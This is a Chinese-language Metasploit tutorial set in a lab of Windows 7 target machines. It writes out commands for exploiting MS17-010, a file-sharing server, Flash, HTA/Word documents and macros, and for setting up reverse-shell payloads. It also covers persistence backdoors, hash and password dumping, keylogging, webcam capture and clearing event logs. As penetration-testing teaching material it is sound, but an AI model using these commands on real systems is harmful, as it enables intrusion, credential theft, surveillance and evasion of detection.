Metasploit基础使用教程
msfconsole 是 Metasploit Framework 的主控制台程序,它是用户与 Metasploit 交互最常用的方式。
功能特点:
- 提供统一界面来加载 exploit、payload、auxiliary 模块
- 支持自动补全、历史记录、脚本化操作
- 集成编码器(encoders)、nops、后渗透模块(post)
- 可直接发起攻击、监听反弹会话、进行漏洞扫描等
启动方式:
msfconsole
Bash
启动后你会看到类似如下提示符:
msf6 >
Plain text
注:
msf6表示当前为 Metasploit v6.x 版本。
在 /usr/share/metasploit-framework/modules下面常用的分为四个模块
- auxiliary(辅助模块): 用于执行信息收集、扫描和服务验证等任务,但不会直接利用漏洞
- encoders(编码器): 用于对 Payload(攻击载荷)进行编码,以绕过简单的防护机制(如杀毒软件或防火墙)。
- evasion(规避模块) :用于绕过高级防护系统(如入侵检测系统 IDS 或杀毒软件)
- exploits(漏洞利用模块): 用于利用目标系统的已知漏洞,进行初步入侵
在 Metasploit 的 exploits 目录下,各个子目录和文件存放的是针对不同平台和系统的漏洞利用模块。这些模块用于利用目标系统的已知漏洞,进行渗透或攻击操作。这里以windows为例
这里会列出针对windows平台不同服务的漏洞,smb服务是windows中经常爆出漏洞的服务 进入可以查看smb服务爆过什么漏洞
在 /usr/share/metasploit-framework/modules下面还有两个模块
-
nops(No Operation 指令模块): 用于填充数据,以便在内存中对 Payload 进行对齐,通常与 Exploit 模块配合使用。
-
payloads(载荷模块): 载荷是攻击的实际内容,分为多种类型
- adapters(适配器模块):将不同类型的载荷或模块连接在一起,用于特殊情况下的载荷转换或增强
- singles(单阶段载荷):单阶段载荷是一个独立的完整攻击代码,不依赖其他模块,可以一次性完成攻击任务。执行一次性命令或任务(如创建用户、关闭系统、发送文件等)
- stagers(初始阶段载荷): 初始阶段载荷是分阶段载荷的第一部分,主要用于建立与目标系统的通信或连接。建立反向连接或绑定连接(如 TCP、HTTP)为后续阶段载荷传递数据。需要后续阶段(Stage)才能完成攻击
- Stages(后续阶段载荷): 后续阶段载荷是分阶段载荷的第二部分,包含实际的攻击功能或操作 执行后渗透操作(如权限提升、数据窃取)。维持持久化控制。
在 Metasploit 中,我们可以通过Payload的名称和使用格式来推断它的类型:
- post(后渗透模块): 用于在成功入侵目标后,进一步执行操作(如信息提取、权限提升、持久化等)。
一、使用Auxiliary辅助模块对漏洞进行探测
-
在kali命令行中使用msfconsole进入msf框架
-
使用search 搜索漏洞相关利用模块
-
使用 辅助模块 smb_ms17_010漏洞探测模块对smb_ms17_010漏洞进行探测
-
查看使用辅助模块需要填写什么参数 show options
-
设置要填写的参数 RHOSTS 目标主机或目标主机范 围(IP 地址或 CIDR 范围)。
-
set rhosts 192.168.162.100-192.168.162.200
-
-
对上面范围内的ip进行探测
有+号代表可能存在漏洞的主机 这里显示 192.168.162.136主机可能存在漏洞
二、使用exploit模块对漏洞进行利用
-
选择漏洞攻击模块,对漏洞进行利用
use exploit/windows/smb/ms17_010_eternalblue
-
使用info查看模块信息
-
show targets查看可攻击的系统平台,显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统:
三、payload对漏洞进行攻击
-
查看攻击载荷 :show payloads 该命令可以查看当前漏洞利用模块下可用的所有Payload
-
设置攻击载荷:
set payload windows/x64/meterpreter/reverse_tcp
- 查看模块需要配置的参数show options
- 设置攻击载荷参数
set RHOST 192.168.162.136 *#设置RHOST,也就是要攻击主机的ip*set LHOST 192.168.162.128 *#设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell*set lport 5555 *#设置lport,也就是我们主机的端口,反弹shell到这个端口;如果我们这里不设置lport的话,默认是4444端口监听*
-
进行攻击
四、后渗透阶段
对目标主机进行攻击,并获取 Meterpreter 会话,从而实现对目标系统的远程控制
运行成功之后,我们将会看到命令提示符 meterpreter > 出现
五、Meterpreter 核心命令(Core Commands)
| 命令 | 别名 | 说明 |
|---|---|---|
? |
- | 显示帮助菜单 |
background |
bg |
将当前会话挂入后台 |
bgkill |
- | 终止正在运行的后台脚本 |
bglist |
- | 列出所有后台运行的脚本 |
bgrun |
- | 以后台线程方式运行一个 Meterpreter 脚本 |
channel |
- | 查看或控制活动通信频道 |
close |
- | 关闭指定 channel |
detach |
- | 分离会话(适用于 HTTP/HTTPS 隧道) |
disable_unicode_encoding |
- | 禁用 Unicode 编码(用于兼容旧系统) |
enable_unicode_encoding |
- | 启用 Unicode 编码 |
exit / quit |
互为别名 | 结束当前 Meterpreter 会话 |
get_timeouts |
- | 获取当前会话超时设置 |
guid |
- | 获取会话唯一 GUID |
help |
- | 显示帮助信息(同 ?) |
info |
- | 显示 Post 模块详细信息 |
irb |
- | 在当前会话中启动交互式 Ruby shell |
load |
use(不推荐) |
加载扩展模块(如 powershell, python) |
machine_id |
- | 获取目标机器在 MSF 中的唯一 ID |
migrate |
- | 迁移进程(提升稳定性,避免崩溃) |
pivot |
- | 管理内网流量转发监听器 |
pry |
- | 启动 Pry 调试环境(高级调试) |
read |
- | 从 channel 读取数据 |
resource |
- | 执行本地存储的 .rc 脚本文件 |
run |
- | 运行 Meterpreter 脚本或后渗透模块 |
secure |
- | 重新协商 TLV 数据包加密机制 |
sessions |
- | 快速切换到其他会话 |
set_timeouts |
- | 设置会话超时时间(秒) |
sleep |
- | 让 Meterpreter 静默一段时间后重连 |
ssl_verify |
- | 修改 SSL 证书验证行为 |
transport |
- | 管理传输方式(如 http → https 切换) |
uuid |
- | 获取当前会话的 UUID |
Stdapi:文件系统命令(File System)
| 命令 | 说明 |
|---|---|
cat <file> |
输出文件内容到屏幕 |
cd <dir> |
切换远程工作目录 |
checksum <type> <file> |
计算文件校验值(支持 md5/sha1/sha256) |
cp <src> <dst> |
复制远程文件 |
del <file> |
删除远程文件 |
dir / ls |
列出当前目录文件 |
download [src] [dst] |
下载远程文件/目录到本地 |
edit <file> |
使用系统默认编辑器打开并修改文件 |
getwd |
显示远程当前工作目录 |
getlwd / lpwd |
显示本地工作目录 |
lcd <dir> |
切换本地工作目录 |
lls |
列出本地文件 |
mkdir <dir> |
创建远程目录 |
mv <src> <dst> |
移动/重命名远程文件 |
pwd |
显示远程当前路径(同 getwd) |
rm <file> |
删除远程文件 |
rmdir <dir> |
删除远程空目录 |
search -d <dir> -f <pattern> |
在指定路径搜索文件(支持通配符) 例:search -d c:\\ -f *.exe |
show_mount |
列出所有磁盘分区和挂载点 |
Stdapi:网络命令(Networking)
| 命令 | 说明 |
|---|---|
arp |
查看目标主机 ARP 缓存表 |
getproxy |
显示当前代理配置(如有) |
ifconfig / ipconfig |
显示网络接口信息(含 IP、MAC) |
netstat |
查看开放端口与连接状态 |
portfwd <add/del/list> [options] |
端口转发(本地端口映射到内网服务) 例: portfwd add -l 3306 -p 3306 -r 192.168.1.100 |
resolve <hostname> |
在目标上解析域名(绕过本地 DNS) |
route <print/add/del> |
查看或修改路由表(实现多层内网穿透) |
Stdapi:系统命令(System)
| 命令 | 说明 |
|---|---|
clearev |
清除事件日志(Application/Security/System) |
drop_token |
放弃当前模拟的 Token 权限 |
execute -f <cmd> [-H][-t][-i] |
执行程序 -H: 不可见窗口 -t: 创建新线程 -i: 交互式运行 |
getenv [VAR] |
获取环境变量值(如 %TEMP%, PATH) |
getpid |
获取 Meterpreter 当前运行的进程 PID |
getprivs |
尝试启用当前用户可用的所有权限(如 SeDebugPrivilege) |
getid |
获取当前用户的 SID(安全标识符) |
getuid |
获取当前运行用户身份(如 NT AUTHORITY\SYSTEM) |
kill <PID> |
终止指定进程 |
localtime |
显示目标系统的本地日期和时间 |
pgrep <name> |
按名称查找进程及其 PID |
pkill <name> |
终止匹配名称的所有进程 |
ps |
列出所有正在运行的进程(含 PID、会话 ID、架构) |
reboot [timer] |
重启目标主机(可设延迟) |
reg <command> |
注册表操作(见下方子命令) |
rev2self |
回退到原始用户上下文(退出 impersonation) |
shell |
弹出系统命令行 shell(cmd.exe) |
shutdown |
关闭目标计算机 |
steal_token <PID> |
窃取指定进程的访问令牌(实现权限模仿) |
suspend <PID> / resume <PID> |
暂停或恢复某个进程 |
sysinfo |
获取系统信息:OS 版本、架构、主机名、用户等 |
输入shell切换到windows目标主机里面
要想从目标主机shell退出到meterpreter ,我们只需输入:exit:
从meterpreter退出到MSF框架使用background命令:
sessions -l 查看前面获得的meterpreter_shell会话,最前面的数字是会话的id
输入sessions [id号]即可进入相应的meterpreter_shell中:
输入:shell即可进入 cmd 类型的控制,再输入:powershell,即可进入 powershell 类型的控制台:
六、Meterpreter 核心信息侦察
| 命令 | 功能说明 | 示例 |
|---|---|---|
sysinfo |
获取目标系统基本信息(OS、主机名、架构) | sysinfo |
getuid |
查看当前会话运行的用户权限 | getuid → NT AUTHORITY\SYSTEM |
getpid |
获取当前 Meterpreter 所在进程 PID | getpid → 1384 |
ps |
列出所有进程(可配合 pgrep/pkill) |
`ps |
idletime |
查看用户空闲时间(判断是否在线) | idletime → User has been idle for 32 seconds |
文件系统操作
| 命令 | 功能说明 | 示例 |
|---|---|---|
pwd / getwd |
显示远程当前工作目录(Windows) | pwd |
getlwd |
显示本地攻击机当前路径(Linux/macOS) | getlwd |
search -f *.jsp -d e:\\ |
在 E 盘搜索所有 .jsp 文件 |
search -f *.docx -d c:\\users\\ |
download e:\\test.txt /root/ |
下载文件到本地指定路径 | download c:\\secret.txt /tmp/ |
upload /root/test.txt d:\\backup\\ |
上传本地文件至目标机 | upload shell.exe c:\\windows\\temp\\ |
⚠️ 注意:路径使用双反斜杠
\\或正斜杠/避免转义问题
进程迁移与持久化
| 命令 | 功能说明 | 示例 |
|---|---|---|
migrate 1384 |
将 Meterpreter 迁移到指定 PID 进程(提升稳定性) | migrate 4(常迁移到 System 或 explorer.exe) |
run post/windows/manage/migrate |
自动选择稳定进程进行迁移 | run post/windows/manage/migrate |
run exploit/windows/local/persistence lhost=192.168.100.132 lport=8888 |
创建开机自启后门并反连 | 修改注册表实现持久化,易被杀软检测 |
✅ 推荐替代方案:
# 使用更隐蔽的 persistence 脚本
run persistence -X -i 60 -p 443 -r 192.168.100.132
Bash
-X: 开机启动-i: 心跳间隔(秒)-p: 反弹端口-r: 攻击机 IP
权限提升与密码抓取
| 命令 | 功能说明 | 示例 |
|---|---|---|
getsystem |
尝试提权至 NT AUTHORITY\SYSTEM |
getsystem(需管理员权限) |
run getgui -u test1 -p Abc123456 |
添加新用户并启用远程桌面支持 | 创建账户 test1 并加入 Administrators 组 |
run getgui -e |
启用目标机远程桌面服务(RDP) | 开启 TermService 并放行防火墙 3389 端口 |
load kiwi |
加载 Mimikatz 模块(内存抓密码必备) | load kiwi |
run hashdump |
导出 SAM 中的 NTLM 哈希(需 SYSTEM 权限) | run hashdump → 得到 Administrator:500:aad3b435... |
run post/windows/gather/smart_hashdump |
自动识别域/本地环境并 dump 哈希 | 支持导出 NTDS.dit(域控适用) |
run post/windows/gather/credentials/windows_autologin |
抓取自动登录凭据(注册表) | 从 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 提取明文密码 |
🔐 提示:若
hashdump失败,请先执行:
getprivs
migrate 4 # 迁移到 PID 4 (System)
getsystem
Bash
网络与内网穿透
| 命令 | 功能说明 | 示例 |
|---|---|---|
portfwd add -l 9999 -p 3389 -r 192.168.100.158 |
将内网主机 3389 端口映射到本地 9999 | 实现通过 localhost:9999 连接目标 RDP |
run post/windows/manage/autoroute |
查看或添加路由,实现多层内网穿透 | run autoroute -s 192.168.1.0/24 |
arp |
查看目标 ARP 缓存(辅助定位设备) | arp |
netstat |
查看开放端口和服务连接状态 | netstat |
resolve www.baidu.com |
在目标上解析域名(绕过 DNS 出网限制) | resolve intranet.local |
🌐 应用场景:拿下跳板机后,利用
portfwd+autoroute扫描整个内网段。
用户行为控制与监控
| 命令 | 功能说明 | 示例 |
|---|---|---|
screenshot |
截取目标当前桌面画面 | 自动生成 .png 文件下载 |
webcam_list |
列出摄像头设备 | webcam_list |
webcam_snap |
调用摄像头拍照 | webcam_snap -i 0 |
webcam_stream |
开启实时视频流(需 GUI) | 浏览器打开链接观看 |
keyscan_start |
开始记录键盘输入 | keyscan_start |
keyscan_dump |
导出已捕获的按键内容 | keyscan_dump → 显示 username<PASSWORD>{ENTER} |
keyscan_stop |
停止键盘监听 | keyscan_stop |
uictl disable keyboard |
禁用目标键盘(仅限 GUI) | 防止用户操作 |
uictl enable keyboard |
恢复键盘使用 | 安全退出前恢复 |
uictl disable mouse |
禁用鼠标 | 结合禁用键盘实现完全锁定 |
uictl enable mouse |
恢复鼠标 |
七、Metasploit对目标主机攻击的方式
1.Metasploit对操作系统进行攻击
2.Metasploit对应用程序进行攻击
靶机:win7 32位
应用程序 :Easy File Sharing Web Server
在靶机上面启动我们的Easy File Sharing Web Server 点击 Try it
启动之后会在计算机的80 端口和443端口同时对外发布服务
将里面的IP地址复制到浏览器里面访问
启动msfconsole 在命令行中搜索与这个应用程序相关的漏洞
这里我们使用exploit/windows/http/easyfilesharing_seh模块
show options 查看这个模块使用需要填写什么参数 发现rhosts目标主机的ip地址需要设置 将刚刚访问的网址ip设置到rhosts中
这里再设置我们的payload会在目标机器上执行,建立一个反向连接到你的攻击机器
设置我们反弹shell的本地机的IP地址
最近进行攻击 成功获得 meterpreter
3.Metasploit利用浏览器插件漏洞进行渗透
靶机:win7 32位
浏览器插件 :adobe_flash
这是我们靶机上面安装的adobe_flash版本号
启动msfconsole 使用search adobe_flash 查找相关漏洞模块
这里我们使用use exploit/windows/browser/adobe_flash_domain_memory_uaf模块
exploit/windows/browser/adobe_flash_domain_memory_uaf是 Metasploit 框架中的一个 exploit 模块,用于利用 Adobe Flash Player 中的一个 Use-After-Free (UAF) 漏洞。这个漏洞影响的是 Windows 操作系统上的 Adobe Flash Player,并且可以被用来执行任意代码(通常是反向连接或命令执行)。
使用show options查看模块如何使用
这里我们看到这个模块默认使用Payload options (windows/meterpreter/reverse_tcp) 下面需要填写的参数已经设置好了 不需要额外的操作 直接run
http://192.168.162.128:8080/950WKOh这个模块建立了一个服务器 这个服务器可以从外界访问 在外界访问的过程中不是正常的网页 而是漏洞攻击的数据包 如果目标计算机浏览器里面的插件受影响的范围内 那么就会被攻击 控制端会打开meterpeter控制权限
4.利用HTA文件进行渗透
靶机:win7 32位
HTA 文件渗透攻击(HTA 文件攻击)是一种通过使用 HTML 应用程序(HTA)文件进行恶意活动的攻击方式。HTA 文件是一种特殊的文件格式,通常用来创建可执行的 HTML 应用程序,具有比普通 HTML 文件更强的功能。它们允许将 HTML、JavaScript 和 VBScript 代码嵌入到文件中,并能在 Windows 系统中直接运行。
文件特点
- HTA 文件可以包含 HTML、JavaScript 和 VBScript 代码,并且能够直接在 Windows 环境中运行。
- HTA 文件通常以
.hta文件扩展名存在,并且可以执行脚本和访问系统资源,因此相较于普通 HTML 文件,它具有更高的执行权限。 - HTA 文件通常通过 Windows 脚本宿主(Windows Script Host,WSH)执行,WSH 是一个 Windows 的内建组件,允许运行脚本文件。
实习hta攻击的方法也比较简单 黑客只需要构建一个包含hta恶意文件的web服务器 诱使受害者点击这个网址 那么受害者的设置就可能运行恶意文件
hta不容易给杀毒软件发现 相比起exe不太是重点检查的目标 所以常常hta攻击脚本和其他攻击脚本相结合 例如CVE-2017-0199
CVE-2017-0199 是一个在 Microsoft Office 和 Microsoft Word 中的漏洞,属于远程代码执行漏洞。这一漏洞主要影响了 Microsoft Office Word 和 Office Excel 相关版本,攻击者利用该漏洞能够通过精心制作的 Office 文档(如
.doc或.xls文件)来执行恶意代码。
- 攻击方式:通过打开含有恶意嵌入式对象(如 OLE 对象)的 Microsoft Word 或 Excel 文档,攻击者能够利用该漏洞执行恶意代码。这通常是通过将恶意代码嵌入到 Word 或 Excel 文件中的一个嵌入式对象(如
.htm、.html或.mht文件)来完成的。
这里打开msfconsole 使用 use exploit/windows/fileformat/office_word_hta 模块
show options 查看需要填写的参数
这里也是我们看到这个模块默认使用Payload options (windows/meterpreter/reverse_tcp) 下面需要填写的参数已经设置好了 不需要额外的操作 直接run
一个生成了一个带有木马的/root/.msf4/local/msf.doc 隐藏文件
以及一个包含了恶意文件的hta的web文件服务器IP地址
将ip地址发送到靶机上
只要目标靶机点击了运行 控制端就能获取meterpreter
同样将/root/.msf4/local/msf.doc的隐藏文件发送到目标机上运行也是如此
将隐藏文件移动到~目录下
将文件移动到靶机上运行
点击运行
控制端就能获取meterpreter
5.使用word宏进行渗透利用
靶机:win7 32位
在kali中生成一个vba的被控端
启动msfvenom
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.162.128 lport=4444 -e x86/shikata_ga_nai -f vba-exe
这个payload分为两部分 一部分是Auto_Open()的函数
另外一部分是字符形式的payload
再使用word将这两段代码制作成宏文件
打开word->开发工具->工具栏->宏
修改宏名 点击创建
将生成的代码复制到里面再点击 word图标
将另外一段代码复制上去
接下来只要将这个文件发送给被控端 被控端打开 里面的恶意文件就会执行
打开主控端
将参数设置好后 被控端打开包含恶意代码的文件 主控端获得meterpreter
6.使用autopwn进行测试
靶机 : win7 32位
如果你觉得一个一个地选择模块很麻烦,也可
以考虑使用 browser_autopwn 模块。这种攻
击的思路是渗透者构造一个攻击用的 Web 服务
器,然后将这个 Web 服务器的地址发给目标用
户,当目标用户使用有漏洞的浏览器打开这个
地址的时候,攻击用的 Web 服务器就会向浏览
器发送各种攻击脚本,如果其中某个攻击脚本
攻击成功的话,就会在目标主机上建立一个
Meterpreter 会话。
启动 msfconsole 搜索 autopwn模块
使用use auxiliary/server/browser_autopwn2查看要使用的参数
SRVHOST:表示web服务器地址
SRVPORT:表示web服务器端口
启动run 建立好一个用来一个攻击的web服务器 里面集成了很多个浏览器漏洞 漏洞模块需要一个一个启动
所以模块启动后将链接发送给目标http://192.168.162.128:8080/o4A6bVaBloWo
当目标主机使用浏览器打开的时候web服务器就会一个一个去试 使用sessions查看已经建立的链接
)
